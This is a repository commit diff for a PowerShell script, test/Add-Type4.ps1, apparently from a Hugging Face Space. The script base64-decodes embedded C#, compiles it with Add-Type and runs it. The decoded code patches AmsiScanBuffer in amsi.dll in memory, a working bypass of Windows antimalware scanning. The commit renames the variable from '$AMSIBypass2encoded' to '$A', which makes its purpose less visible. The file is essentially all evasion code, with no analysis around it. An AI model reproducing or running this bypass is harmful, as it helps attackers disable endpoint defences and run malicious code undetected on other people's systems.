Spaces:

enotkrutoy
/

gggg

Runtime error

App Files Files Community

enotkrutoy commited on Jan 21

Commit

8e0cd00

verified ·

1 Parent(s): 8c05fde

Update test/Add-Type4.ps1

Browse files

Files changed (1) hide show

test/Add-Type4.ps1 +4 -4

test/Add-Type4.ps1 CHANGED Viewed

@@ -1,4 +1,4 @@
-$AMSIBypass2encoded = 'dQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsACgBuAGEAbQBlAHMAcABhAGMAZQAgAFIAYQBuAGQAbwBtAE4AYQBtAGUAcwBwAGEAYwBlAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABSAGEAbgBkAG8AbQBDAGwAYQBzAHMACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAFUASQBuAHQAUAB0AHIAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABsAHAAZgBsAE8AbABkAFAAcgBvAHQAZQBjAHQAKQA7AAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAGYAYQBsAHMAZQApAF0ACgAgACAAIAAgACAAIAAgACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIABJAG4AdABQAHQAcgAgAHMAcgBjACwAIABpAG4AdAAgAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAUgBhAG4AZABvAG0ARgB1AG4AYwB0AGkAbwBuACgAKQAKACAAIAAgACAAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABUAGEAcgBnAGUAdABEAEwATAAgAD0AIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAGEAbQBzAGkALgBkAGwAbAAiACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAAVABvAHQAYQBsAGwAeQBOAG8AdABUAGgAYQB0AEIAdQBmAGYAZQByAFkAbwB1AFIATABvAG8AawBpAG4AZwBGAG8AcgBQAHQAcgAgAD0AIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABUAGEAcgBnAGUAdABEAEwATAAsACAAIgBBAG0AcwBpACIAIAArACAAIgBTAGMAYQBuACIAIAArACAAIgBCAHUAZgBmAGUAcgAiACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFUASQBuAHQAUAB0AHIAIABkAHcAUwBpAHoAZQAgAD0AIAAoAFUASQBuAHQAUAB0AHIAKQA1ADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AGkAbgB0ACAAWgBlAHIAbwAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAFQAbwB0AGEAbABsAHkATgBvAHQAVABoAGEAdABCAHUAZgBmAGUAcgBZAG8AdQBSAEwAbwBvAGsAaQBuAGcARgBvAHIAUAB0AHIALAAgAGQAdwBTAGkAegBlACwAIAAwAHgANAAwACwAIABvAHUAdAAgAFoAZQByAG8AKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQgB5AHQAZQBbAF0AIABvAG4AZQAgAD0AIAB7ACAAMAB4ADMAMQAgAH0AOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEIAeQB0AGUAWwBdACAAdAB3AG8AIAA9ACAAewAgADAAeABmAGYALAAgADAAeAA5ADAAIAB9ADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAG4AdAAgAGwAZQBuAGcAdABoACAAPQAgAG8AbgBlAC4ATABlAG4AZwB0AGgAIAArACAAdAB3AG8ALgBMAGUAbgBnAHQAaAA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5AHQAZQBbAF0AIABzAHUAbQAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwBsAGUAbgBnAHQAaABdADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABvAG4AZQAuAEMAbwBwAHkAVABvACgAcwB1AG0ALAAwACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAdwBvAC4AQwBvAHAAeQBUAG8AKABzAHUAbQAsAG8AbgBlAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACAAPQAgAE0AYQByAHMAaABhAGwALgBBAGwAbABvAGMASABHAGwAbwBiAGEAbAAoADMAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABNAGEAcgBzAGgAYQBsAC4AQwBvAHAAeQAoAHMAdQBtACwAIAAwACwAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACwAIAAzACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAATQBvAHYAZQBNAGUAbQBvAHIAeQAoAFQAbwB0AGEAbABsAHkATgBvAHQAVABoAGEAdABCAHUAZgBmAGUAcgBZAG8AdQBSAEwAbwBvAGsAaQBuAGcARgBvAHIAUAB0AHIAIAArACAAMAB4ADAAMAAxAGIALAAgAHUAbgBtAGEAbgBhAGcAZQBkAFAAbwBpAG4AdABlAHIALAAgADMAKQA7AAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0ACgB9AA=='
-$decodedString = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($AMSIBypass2encoded))
-Add-Type -TypeDefinition $decodedString -ReferencedAssemblies System.Windows.Forms
-[RandomNamespace.RandomClass]::RandomFunction()

+$A = 'dQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsACgBuAGEAbQBlAHMAcABhAGMAZQAgAFIAYQBuAGQAbwBtAE4AYQBtAGUAcwBwAGEAYwBlAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABSAGEAbgBkAG8AbQBDAGwAYQBzAHMACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAFUASQBuAHQAUAB0AHIAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABsAHAAZgBsAE8AbABkAFAAcgBvAHQAZQBjAHQAKQA7AAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAGYAYQBsAHMAZQApAF0ACgAgACAAIAAgACAAIAAgACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIABJAG4AdABQAHQAcgAgAHMAcgBjACwAIABpAG4AdAAgAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAUgBhAG4AZABvAG0ARgB1AG4AYwB0AGkAbwBuACgAKQAKACAAIAAgACAAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABUAGEAcgBnAGUAdABEAEwATAAgAD0AIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAGEAbQBzAGkALgBkAGwAbAAiACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAAVABvAHQAYQBsAGwAeQBOAG8AdABUAGgAYQB0AEIAdQBmAGYAZQByAFkAbwB1AFIATABvAG8AawBpAG4AZwBGAG8AcgBQAHQAcgAgAD0AIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABUAGEAcgBnAGUAdABEAEwATAAsACAAIgBBAG0AcwBpACIAIAArACAAIgBTAGMAYQBuACIAIAArACAAIgBCAHUAZgBmAGUAcgAiACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFUASQBuAHQAUAB0AHIAIABkAHcAUwBpAHoAZQAgAD0AIAAoAFUASQBuAHQAUAB0AHIAKQA1ADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AGkAbgB0ACAAWgBlAHIAbwAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAFQAbwB0AGEAbABsAHkATgBvAHQAVABoAGEAdABCAHUAZgBmAGUAcgBZAG8AdQBSAEwAbwBvAGsAaQBuAGcARgBvAHIAUAB0AHIALAAgAGQAdwBTAGkAegBlACwAIAAwAHgANAAwACwAIABvAHUAdAAgAFoAZQByAG8AKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQgB5AHQAZQBbAF0AIABvAG4AZQAgAD0AIAB7ACAAMAB4ADMAMQAgAH0AOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEIAeQB0AGUAWwBdACAAdAB3AG8AIAA9ACAAewAgADAAeABmAGYALAAgADAAeAA5ADAAIAB9ADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAG4AdAAgAGwAZQBuAGcAdABoACAAPQAgAG8AbgBlAC4ATABlAG4AZwB0AGgAIAArACAAdAB3AG8ALgBMAGUAbgBnAHQAaAA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5AHQAZQBbAF0AIABzAHUAbQAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwBsAGUAbgBnAHQAaABdADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABvAG4AZQAuAEMAbwBwAHkAVABvACgAcwB1AG0ALAAwACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAdwBvAC4AQwBvAHAAeQBUAG8AKABzAHUAbQAsAG8AbgBlAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACAAPQAgAE0AYQByAHMAaABhAGwALgBBAGwAbABvAGMASABHAGwAbwBiAGEAbAAoADMAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABNAGEAcgBzAGgAYQBsAC4AQwBvAHAAeQAoAHMAdQBtACwAIAAwACwAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACwAIAAzACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAATQBvAHYAZQBNAGUAbQBvAHIAeQAoAFQAbwB0AGEAbABsAHkATgBvAHQAVABoAGEAdABCAHUAZgBmAGUAcgBZAG8AdQBSAEwAbwBvAGsAaQBuAGcARgBvAHIAUAB0AHIAIAArACAAMAB4ADAAMAAxAGIALAAgAHUAbgBtAGEAbgBhAGcAZQBkAFAAbwBpAG4AdABlAHIALAAgADMAKQA7AAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0ACgB9AA=='
+$d = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($A))
+Add-Type -TypeDefinition $d -ReferencedAssemblies System.Windows.Forms
+[RandomNamespace.RandomClass]::RandomFunction()